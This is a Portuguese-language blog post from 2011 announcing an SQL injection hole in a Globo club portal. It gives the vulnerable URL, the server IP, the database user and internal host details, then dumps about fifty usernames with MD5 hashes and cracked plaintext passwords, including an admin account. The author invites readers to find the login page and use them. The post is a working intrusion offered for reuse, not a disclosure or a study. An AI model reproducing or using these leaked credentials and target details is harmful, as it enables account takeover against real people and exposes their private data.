domingo, 10 de abril de 2011

Vulnerável portal globo nova análize, Login + Senha.


Erro de sql possibilita a invasão do portalclube da globo, essa vul é grande conhecida ja porem não achamos tela de login senha, quem conseguir tem logo abaixo a lista de user e suas senhas :)
OBS:
Tais usuarios devem ser de serviço pago da globo que á mesma não vejo esforço algum pra feixar tal brecha em seu portal, assim prestando um serviço falho e negligente para seus usuarios.

Site:http://portaldaclube.globo.com/noticia.php?hash=4c9db844fef519e85580848a46bd83bb&id=35457
 IP:        201.7.176.72
DB Server:     MySQL
Resp. Time(avg):    87 ms
Current User:     usr_tvclube@10.10.164.7
Sql Version:     5.0.68-enterprise-gpl-log
Current DB:     tvclube
System User:     usr_tvclube@10.10.164.7
Host Name:     riolb249
Installation dir:     /
DB User:     'usr_tvclube'@'10.%.%.%'
Data Bases:     information_schema
        ipmonitor
        mysql
        tvclube

LOGIN // SEHA CRIPT.. // SENHA DESCRIPT..


idenis 15608c11ede24161f59989657b3f2d93 MD5 : santarita
lady 1729bc477f7b098b508c1e99269c74a1 MD5 : lady
amelia 176226b2d51002d2590f048881560569 MD5 : amelia
wendel 180f2b3fd15267deb08c088cb642db61 MD5 : esperantina
reinaldo 187a4958af68436bf1ce3dda5e2a3905 MD5 : reinaldo
marcio 1b150854805cbe12194c8dbc55c900cd MD5 : marcio
tereza 1ea438f58e538b595071443411d5f6b7 MD5 : blopes
miranda 1ee1877c6655ecc71dfead311c771bd0 MD5 : miranda
talencar 1f59c7c07b59971cff1de937755bb86a MD5 : talencar
admin 21232f297a57a5a743894a0e4a801fc3 MD5 : admin
clemilton 21c706fed226879e14ba11943358f549 MD5 : clemilton
vilanova 2cab2df7d7f8789081d26df812be437a MD5 : vilanova
layse 3218b3a2b8175efb708bfcde0ff8ef61 MD5 : layse
CLUBE 35459695729aa5dfd8321515f45d6920 MD5 : CLUBE
Pedro 38e2b2e31c0fce9537f735dda9fdf10a MD5 : Pedro
valterlima 39505886ed5f20d8662388273cb70a7d MD5 : valterlima
deusa 39ca2dfb7ab0ae9b11995588c57d1414 MD5 : deusa
tamiris 39d9ff3ebbbed1e41b8892b5edf03e20 MD5 : tamires
josevita 3e5add7a6c97395506294c70705cd02e MD5 : josevita
clube3 45a63b4855983232bc546c00a20f6ee5 MD5 : clube3
antonio 4a181673429f0b6abbfd452f0f3b5950 MD5 : antonio
christiane 4ccf963379bd67fbde81b52adade3384 MD5 : emartins
Chagas Silva 571c27315c70037116b4826ab5897e98 MD5 : Chagas Silva
raiylson 605759bf31a1fcfa4bcb8996baf247af MD5 : raiylson
Parnaíba 6081a835f52987a08b0fb66732924b1f [Not Found]
aldeneides 63c51bad7c27cb9fe4a19b0043b6895c MD5 : aldeneides
Raimundo Nonato 72657bc8f5c9491ae8b090ccefa14cbc MD5 : Raimundo Nonato
josegil 75d95b03ad68de5fded7c78aa424787b MD5 : josegil
gilson 7a3838bd6e1c4efdaff13d2ccc5380e6 MD5 : d@ni3ll3
wauthier 7ba4979beb4eb2626142b3fe940c04d2 MD5 : wauthier
teresa 87574e3e9216e89429f8af597b016479 MD5 : buriti
natanael 8a67e964ad9c7a48de18d6ae7a9dbf2b MD5 : natanael
psaboia 8f31bd17ca05982113975b413d2fe2ab MD5 : psaboia
globo 909f6c90b6db150078092be31dc47ffd MD5 : globo
flavio 978f5586ff4b42ead079d1f802fb05f4 MD5 : paulistana
emerson 9a064cee0381711e8579448294ab4be3 [Not Found]
george 9b306ab04ef5e25f9fb89c998a6aedab MD5 : george
nilson 9c405163c4de5cf5d7f0deb741a7e27e MD5 : nilson
jonas 9c5ddd54107734f7d18335a5245c286b MD5 : jonas
charles a5410ee37744c574ba5790034ea08f79 MD5 : charles
anna a70f9e38ff015afaa9ab0aacabee2e13 MD5 : anna
gilberto bafff1df7d916f99fbe8be1a81dc326f MD5 : gilberto
Richards bb80b7c78cbc7101c375ab38d63a2b07 MD5 : richards
Portal da Clube c02484ccba66e0681adc1b6f6e0b664c [Not Found]
neudenor c579342cf5f90550189f1ee833e1d9db MD5 : neudenor
klecio c62a48a206157722b13df45fae62be11 MD5 : klecio
welhitom ccebf5637246df8383b5473e0115708a MD5 : welhitom
virgiane d10d259e89cade42ca16ff46c4c89b43 MD5 : virgiane
weslley d38b704c2b6a0f01ca520bc0fc49a312 MD5 : weslley
paulobarro dd41cb18c930753cbecf993f828603dc MD5 : paulo
tony ddc5f5e86d2f85e1b1ff763aff13ce0a MD5 : tony
jose df5ba866ae83a5a7cbaae75a18dd398a MD5 : smendes
paz e003268a052a053ee5ec481e2a097648 MD5 : paz
zmaia e434dd9c7f573fb03924e0c4d3d44d45 MD5 : eco
portal eca1d1f97ba4b98284990de8dd03684c MD5 : globo.com
daniel f1b9cb2cd92b9534bbdf45c001ba8f78 MD5 : uniao

2 comentários:

............